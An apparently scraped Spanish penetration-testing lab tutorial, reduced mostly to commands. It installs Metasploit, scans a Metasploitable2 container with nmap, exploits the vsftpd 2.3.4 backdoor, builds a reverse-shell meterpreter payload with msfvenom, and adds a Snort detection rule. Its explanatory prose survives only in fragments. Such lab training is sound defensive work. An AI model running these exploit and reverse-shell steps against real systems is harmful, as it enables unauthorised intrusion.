by Enrique Serrano Lendines
sudo apt install curl
curl
utilizada para descargar archivos desde la línea de comandos.msfinstall
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
msfinstall
desde el repositorio de Metasploit en GitHub.chmod 755 msfinstall
msfinstall
.msfinstall
sudo ./msfinstall
msfinstall
. Añade Metasploit al listado de repositorios, actualiza el paquete cache e instala Metasploit Framework.msfupdate
msfconsole
docker pull tleemcjr/metasploitable2
docker run --name vulnerada -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
sudo apt install nmap
nmap -sS -Pn 172.17.0.2
nmap -sV -p 21 --script vuln 172.17.0.2
search vsftpd 2.3.4
use 0
show payloads
set payload payload/cmd/unix/interact
options
set rhost 172.17.0.2
run
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.18 LPORT=4444 -f elf -o backdoor.elf
sudo apt install -y snort
sudo nano /etc/snort/snort.conf
alert tcp any any -> any 21 (msg:"FTP ProFTPD ModCopy Remote Command Execution"; flow:to_server,established; content:"SITE CPFR"; sid:1000001;)
snort -A console -q -c /etc/snort/snort.conf